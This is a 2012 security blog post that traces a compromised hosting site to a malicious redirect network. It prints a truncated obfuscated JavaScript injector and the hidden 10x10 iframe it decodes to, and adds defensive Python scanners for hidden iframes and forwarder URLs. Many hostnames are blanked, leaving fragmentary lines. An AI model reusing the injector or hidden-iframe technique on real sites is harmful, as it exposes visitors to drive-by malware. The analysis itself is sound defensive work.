Saturday, September 1, 2012

Suspicious Movement in ASN40034 (infector to &

It begins with the infected homepage of the hosting site at hxxp://
It is a good, honest site. Sadly, it is carrying suspicious code at 
I downloaded it to examine and found the JavaScript below:
<script>el=document.createElement("div");try{a}catch(qq) {el.appendChild(document.createElement("p")); el.appendChild(document.createTextNode("q")); el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el) {appendChild(document.createTextNode("eva"));}} k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44 c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32 c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104 c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76 c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....
This was easy to deobfuscate, and it yields the iframe injector below:
<iframe src='hxxp://' width='10' height='10' style= 'visibility:hidden;position:absolute;left:0;top:0;'></iframe>
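The injected tag above is the classic "invisible iframe" pattern: a 10x10 frame, pulled off-screen and hidden with CSS, so the victim never sees the loader page. As an added example (my own detection snippet, not code from the original post or from the infected site), here is a small scanner that walks an HTML document and flags iframes that are tiny or hidden via style. The sample HTML and the placeholder host in it are constructed; the pixel threshold is an assumed tuning value.

```python
"""Flag hidden or near-invisible iframes in an HTML document.

Added example, not from the original post. SAMPLE is constructed to
mirror the injected tag seen on the infected page (10x10, hidden via
CSS, absolutely positioned at the top-left corner).
"""
from html.parser import HTMLParser
import re

# Assumed threshold: a frame whose width AND height are at or below this is "tiny".
MAX_PIXELS = 30
# CSS fragments that make a frame invisible to the user.
HIDING_CSS = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|opacity\s*:\s*0(?:[^.\d]|$)", re.I
)


def _px(value):
    """Parse a width/height attribute ('10', '10px', ...) into an int, or None."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class HiddenIframeFinder(HTMLParser):
    """Collect every <iframe> that is tiny, hidden by CSS, or both."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if w is not None and h is not None and w <= MAX_PIXELS and h <= MAX_PIXELS:
            reasons.append(f"tiny {w}x{h}")
        if HIDING_CSS.search(a.get("style", "")):
            reasons.append("hidden via CSS")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of {'src': ..., 'reasons': [...]} for suspicious iframes."""
    p = HiddenIframeFinder()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: one ordinary video embed and one injected loader frame.
SAMPLE = """<html><body>
<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>
<iframe src='hxxp://injected-host.invalid/in.php' width='10' height='10'
        style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE):
        print(f["src"], "->", ", ".join(f["reasons"]))
```

Running it against SAMPLE reports only the second frame, with both reasons. For triage on a real page, feed it the raw HTML you downloaded rather than a rendered DOM, since the injector above only writes the iframe after the obfuscated script runs.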
That made me check hxxp:// where I found multiple malicious links, as coded below:
The links above obviously exist to make sure users are redirected to the HTML file below, which carries another piece of JS code:
It leads us to the link:
What is this? There are many references to it in the urlquery results below:
This is actually a URL forwarder service used to redirect a request to some other URL, for downloading or other purposes. I checked the recorded URLs and found the query format to be like:
hxxp:// \ 7POJ4E717&gkwrf=hxxp://\ Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
hxxp:// 7POYGN0G2&gkwrf=
In our case, the specific ticket (folio=7POYGN0G2) and domain ( forwarded us to a special path on the host. Feel free to check and analyze further what you can get from that host. The interesting part is that and are in the same network: they share the same IP address with lame malicious domains like:
Blacklisting and would be a good idea!
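Since the forwarder carries its destination in the query string (folio=<ticket>&gkwrf=<url>), the useful check from the defender's side is to pull the ticket and the real landing host out of each logged URL and flag any parameter that smuggles a full URL. The snippet below is an added example of that triage, not code from the original post; the forwarder and landing hostnames in the samples are constructed placeholders, while the parameter names folio and gkwrf and the two ticket values follow the format shown above.

```python
"""Extract ticket and forwarding target from redirector URLs.

Added example, not from the original post. Query layout
folio=<ticket>&gkwrf=<url> follows the page; the hostnames in SAMPLES
are constructed placeholders.
"""
from urllib.parse import urlsplit, parse_qs

# Schemes that mark a query value as an embedded absolute URL (defanged forms included).
EMBEDDED_URL_SCHEMES = ("http://", "https://", "hxxp://", "hxxps://")


def refang(url):
    """Turn defanged hxxp(s):// back into http(s):// so urlsplit parses normally."""
    return url.replace("hxxps://", "https://").replace("hxxp://", "http://")


def analyze_redirect(url):
    """Return redirector host, folio ticket, and hosts embedded in the query."""
    parts = urlsplit(refang(url))
    qs = parse_qs(parts.query, keep_blank_values=True)
    ticket = qs.get("folio", [""])[0]
    embedded = []  # (parameter name, hostname of the embedded URL)
    for name, values in qs.items():
        for v in values:
            if v.lower().startswith(EMBEDDED_URL_SCHEMES):
                embedded.append((name, urlsplit(refang(v)).hostname or ""))
    return {
        "redirector": parts.hostname or "",
        "ticket": ticket,
        "forwards_to": [host for name, host in embedded if name == "gkwrf"],
        "embedded_url_params": [name for name, _ in embedded],
    }


def is_forwarder(url):
    """True when any query parameter carries a full URL (open-redirect style)."""
    return bool(analyze_redirect(url)["embedded_url_params"])


# Constructed log lines in the format observed on the page.
SAMPLES = [
    "hxxp://forwarder.invalid/r?folio=7POYGN0G2&gkwrf=hxxp://landing.invalid/path/index.html",
    "hxxp://forwarder.invalid/r?folio=7POJ4E717&gkwrf=hxxp://other.invalid/Kobenhavn/&p_bkt=",
    "https://www.example.com/page?id=42",
]

if __name__ == "__main__":
    for u in SAMPLES:
        r = analyze_redirect(u)
        print(r["redirector"], r["ticket"] or "-", "->", r["forwards_to"] or "no forward")
```

The first two samples resolve to the landing hosts behind the ticket, which is what you would put on the blocklist alongside the forwarder itself; the third has no embedded URL and is left alone.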